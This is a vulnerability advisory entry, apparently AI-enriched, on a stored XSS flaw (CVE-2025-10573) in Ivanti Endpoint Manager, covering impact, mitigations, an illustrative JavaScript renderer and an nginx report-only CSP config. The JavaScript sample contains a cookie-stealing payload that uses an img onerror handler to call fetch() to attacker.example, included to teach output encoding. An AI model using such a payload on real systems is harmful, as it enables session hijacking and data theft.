CVE-2025-10573: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Ivanti Endpoint Manager
Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required.
AI Analysis
Technical Summary
CVE-2025-10573 is a stored cross-site scripting (XSS) vulnerability, CWE-79, in Ivanti Endpoint Manager (EPM) versions prior to 2024 SU4 SR1. Input that reaches the product from an unauthenticated network position is stored and later emitted into a console page without adequate output encoding, so markup in that input is rendered as markup. The advisory does not name the affected field or page. When an administrator opens the view that renders the stored payload, the attacker's JavaScript executes inside the administrator's authenticated session: it can read what the console shows and issue requests carrying the administrator's session, and therefore perform console actions as that administrator. That is the user interaction the advisory requires; no authentication is needed to plant the payload, which is what makes the bug reachable from outside. Confidentiality, integrity and availability are all affected: administrative data can be exfiltrated, configuration changed and management functions disrupted. The CVSS v3.1 base score of 9.6 (consistent with AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H) reflects network reachability, low attack complexity, no privileges required, required user interaction and a changed scope, since the script runs in the administrator's browser and acts beyond the vulnerable web component. No active exploitation has been reported as of this analysis, but an unauthenticated path to code execution in an administrator session of a product used for endpoint management, patching and security compliance is a significant threat to any organization that relies on it for centralized control.
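The rendering mistake behind CWE-79 and its fix, shown as an added illustration that is not Ivanti's code (the product's real injection point and rendering code are not public; the record field, the page markup, the payload and the attacker hostname below are all constructed for the example):

```javascript
// Added example of the stored-XSS pattern, NOT Ivanti Endpoint Manager code.
// The record below stands in for an attacker-controlled value that an
// unauthenticated client managed to get stored (constructed sample data).
const storedRecord = {
  id: 42,
  name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable: the stored value is concatenated straight into the HTML that
// the administrator's browser renders. The markup in `name` is treated as
// markup, so the onerror handler runs inside the admin's session.
function renderDeviceRowVulnerable(record) {
  return `<tr><td>${record.id}</td><td>${record.name}</td></tr>`;
}

// Hardened: encode for the HTML text context at output time. Every character
// that can open a tag, close an attribute or start an entity is replaced, so
// the browser displays the payload as literal text instead of executing it.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '`': '&#x60;',
  };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

function renderDeviceRowSafe(record) {
  return `<tr><td>${escapeHtml(record.id)}</td><td>${escapeHtml(record.name)}</td></tr>`;
}

// A coarse reviewer's check over rendered output: did untrusted input survive
// as a real tag with an event handler, or as a <script> element? A proper
// review would parse the HTML; this regex is enough to separate the two
// renderers above on the constructed payload.
function containsActiveMarkup(html) {
  return /<\s*[a-z][^>]*\son[a-z]+\s*=/i.test(html) || /<\s*script\b/i.test(html);
}

// Stand-alone run: the vulnerable renderer emits a live <img onerror=...>,
// the safe renderer emits only encoded text.
const vulnerableHtml = renderDeviceRowVulnerable(storedRecord);
const safeHtml = renderDeviceRowSafe(storedRecord);
console.log(vulnerableHtml);
console.log(safeHtml);
```

Encoding is context-specific: the helper above is correct for HTML text and double-quoted attribute values, but a value placed inside a JavaScript string, a URL or a CSS block needs the encoder for that context, and the fix has to be applied at every output point, not only where the payload was first noticed.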
Potential Impact
For European organizations this vulnerability threatens the infrastructure that manages their endpoints, not just one web application. EPM can deploy software, run tasks and change policy on every managed device, so code running in an administrator's console session can potentially push malicious packages to a whole fleet, exfiltrate inventory and configuration data, or disable security controls on endpoints, turning a single stored XSS into a fleet-wide compromise. This is most severe in sectors with strict regulatory requirements such as finance, healthcare and government, where administrative compromise brings compliance violations and reputational damage on top of operational disruption. The user-interaction requirement limits fully automated mass exploitation, but it does not reduce the risk much: administrators open the console routinely, so a stored payload only has to wait for the next visit. The bug is therefore well suited to targeted attacks on European organizations with high-value assets or critical infrastructure.
Mitigation Recommendations
Upgrade Ivanti Endpoint Manager to 2024 SU4 SR1 or later. That is the only real fix: the rendering code belongs to the vendor, so operators cannot add the missing output encoding themselves, and the "review input validation and output encoding" advice applies to Ivanti, not to customers. Until the update is applied:
- Restrict network access to the EPM web interfaces to the management network or a VPN. The advisory does not identify the injection point, so do not assume the console login page is the only way in.
- Do not count on multi-factor authentication or HttpOnly session cookies against this bug. They stop credential replay and plain cookie theft, but injected script runs inside an already authenticated session and can send requests with that session's cookies without ever reading them.
- A Content Security Policy can blunt the payload (a policy without 'unsafe-inline' blocks inline event handlers, and a restrictive default-src blocks exfiltration to foreign origins), but it has to be added at a reverse proxy in front of the vendor application and rolled out in report-only mode first, because vendor consoles often depend on inline scripts and an enforcing policy deployed blind will break the UI.
- A web application firewall with XSS rules in front of the console adds a layer, but signature-based filtering is bypassable; treat it as detection, not prevention.
- Monitor administrative sessions for actions an administrator did not intend: new or modified deployment packages, scheduled tasks, policy changes or new administrator accounts appearing shortly after a console login.
- Tell administrators that the payload is delivered through normal console use rather than through a phishing link, so the useful habit is to report unexpected console behaviour, not merely to avoid suspicious links.
After patching, confirm the installed version, and keep the web interface in scope for regular security audits and penetration tests so similar issues are found proactively.
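A reverse-proxy configuration that applies the two interim controls above (network restriction and a report-only CSP), given as an added example and not as Ivanti's or any vendor's configuration; the hostnames, address ranges, upstream name and report endpoint are assumptions for illustration:

```nginx
# Added example, not vendor configuration. Hostnames, addresses, the upstream
# name and the /csp-report collector are assumed for illustration.
server {
    listen 443 ssl;
    server_name epm.corp.example;
    # TLS certificate and cipher settings go here.

    # Only the management network and a jump host may reach the console.
    allow 10.20.30.0/24;
    allow 10.20.31.5;
    deny  all;

    location / {
        proxy_pass https://epm-core.internal;

        # Report-only first. The example payload in the section above relies on
        # an inline onerror handler and a fetch() to a foreign origin; this
        # policy would block both once enforced. Watch the reports for the
        # console's own inline scripts before switching the header to
        # Content-Security-Policy.
        add_header Content-Security-Policy-Report-Only
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; report-uri /csp-report"
            always;
    }

    # Assumed collector for violation reports; in practice point report-uri
    # at whatever endpoint your logging pipeline exposes.
    location = /csp-report {
        return 204;
    }
}
```

Keep the report-only phase long enough to cover every console workflow administrators actually use; a policy that has only been tested against the login page will produce a flood of violations the first time someone opens a deployment wizard.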
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Sweden, Belgium, Poland, Ireland
Technical Details
- Data Version: 5.2
- Assigner Short Name: ivanti
- Date Reserved: 2025-09-16T18:01:53.783Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69384a3e795dcaf6c511e71f
Added to database: 12/9/2025, 4:11:42 PM
Last enriched: 12/16/2025, 6:53:03 PM
Last updated: 2/7/2026, 11:17:31 AM